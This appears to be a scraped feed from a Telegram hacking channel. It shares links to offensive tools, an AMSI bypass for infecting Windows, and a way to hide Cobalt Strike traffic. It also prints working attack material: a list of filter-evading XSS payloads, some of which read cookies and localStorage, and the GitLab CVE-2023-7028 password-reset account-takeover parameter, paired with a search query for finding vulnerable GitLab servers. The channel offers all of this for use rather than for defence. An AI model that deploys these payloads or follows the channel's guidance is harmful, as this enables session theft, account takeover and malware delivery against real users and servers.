ZeroBypasser.rar
41.6 MB
[+] How to Decode pyArmor codes ( Tutorial )
Password :
#pyArmor #Decode #Tutorial
➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
— > 0Bypasser.py
—— > pydumpck lib
———-—- > Method01
Password :
0101000101000101011110000110110001011001010110000100101001110101010100100101100001101000011101110110001001000111001110010111000001100100010001100011100001101011010010100100011000111001011101110110010101010101010001100111100101100010010101110011100101111001
#pyArmor #Decode #Tutorial
➖➖➖➖➖➖➖➖➖➖➖
IR0Day.Today Bax
@LearnExploit
@Tech_Army
👎17⚡6👍5❤2🆒1
0Day.Today | Learn Exploit | Zero World | Dark web |
[+] How to Decode pyArmor codes ( Tutorial ) — > 0Bypasser.py —— > pydumpck lib ———-—- > Method01 Password : 01010001010001010111100001101100010110010101100001001010011101010101001001011000011010000111011101100010010001110011100101110000011001000100011…
پسورد به صورت دیکد شده هست :)
کساییکه نتونن پسورد رو بدست بیارن پس نمیتونن از این ویدئو استفاده کنن :)
کساییکه نتونن پسورد رو بدست بیارن پس نمیتونن از این ویدئو استفاده کنن :)
✍13👍2👏2🫡1
AllHackingTools - All-in-One Hacking Tools ( for Termux )
Github
#Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
👍6👎2
F#ck AMSI! How to bypass Antimalware Scan Interface and infect Windows
Read
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Read
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡3🔥1
CloudFlare Payload ⚡️
#payload
——————
0Day.Today
@LearnExploit
@Tech_Army
<svg%0Aonauxclick=0;[1].some(confirm)//
<svg onload=alert%26%230000000040"")>
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
<svg onx=() onload=(confirm)(1)>
<svg onx=() onload=(confirm)(document.cookie)>
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
"><onx=[] onmouseover=prompt(1)>
%2sscript%2ualert()%2s/script%2u -xss popup
<svg onload=alert%26%230000000040"1")>
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1
)"Onclick="([1].map(confirm))`#payload
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡4👍2
BugCod3
#shellter #msf #payload #bind
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3❤🔥1❤1🔥1
Hide CobaltStrike - Hide your CobaltStrike PRO⚡️
Hide Your CobaltStrike with CloudFlared Tunnel and Microsoft 100 Traffic%
Github
#trick #cobaltstrike
——————
0Day.Today
@LearnExploit
@Tech_Army
Hide Your CobaltStrike with CloudFlared Tunnel and Microsoft 100 Traffic%
Github
#trick #cobaltstrike
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥2⚡1👍1
Bypass Fuzzer - Fuzz 401/403/404 pages for bypasses
Github
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5👍3🤝1
Udemy - Bug Bounty Hunting Guide to an Advanced Earning Method
Download
#Download
————
0Day.Today
@LearnExploit
@Tech_Army
Download
#Download
————
0Day.Today
@LearnExploit
@Tech_Army
❤🔥5❤3👍1
Cyber Security Courses, Training, Certifications and Resources
The SANS Promise: Everyone who completes SANS training can apply the skills and knowledge they’ve learned the day they return to work.
#Sans #Courses
0Day.Today
Please open Telegram to view this post
VIEW IN TELEGRAM
❤🔥9🔥3⚡1
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Poc:
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
Poc:
user[email][]=valid@email.com&user[email][]=attacker@email.com
#CVE #POC
————
0Day.Today
@LearnExploit
@Tech_Army
🆒6❤3👎1
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
Hunter query: `product.name="Gitlab"`
Hunter
#hunter
————
0Day.Today
@LearnExploit
@Tech_Army
👍7
0Day.Today | Learn Exploit | Zero World | Dark web |
CVE-2023-7028 - GitLab CE/EE Account Takeover via Password Reset without user interactions Poc: user[email][]=valid@email.com&user[email][]=attacker@email.com #CVE #POC ———— 0Day.Today @LearnExploit @Tech_Army
GitHub
GitHub - Vozec/CVE-2023-7028: This repository presents a proof-of-concept of CVE-2023-7028
This repository presents a proof-of-concept of CVE-2023-7028 - Vozec/CVE-2023-7028
❤🔥4❤2👎1
Moriarty - Moriarty scans for a variety of CVEs and vulnerabilities
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
Github
#CVE #Tools
——————
0Day.Today
@LearnExploit
@Tech_Army
GitHub
GitHub - BC-SECURITY/Moriarty: Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential…
Moriarty is designed to enumerate missing KBs, detect various vulnerabilities, and suggest potential exploits for Privilege Escalation in Windows environments. - GitHub - BC-SECURITY/Moriarty: Mor...
⚡4🆒2
CVE-2023-6875 - Authorization Bypass vulnerability in POST SMTP Mailer, a WordPress plugin with over 300,000+ active installations
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
POC
Read
#Bypass #CVE #POC #Wordpress
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥3❤1⚡1
XSS payload with Alert Obfuscation, for bypass RegEx filters⚡️
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
<img src="X" onerror=top[8680439..toString(30)](1337)>
#XSS #Bypass
——————
0Day.Today
@LearnExploit
@Tech_Army
⚡2👍2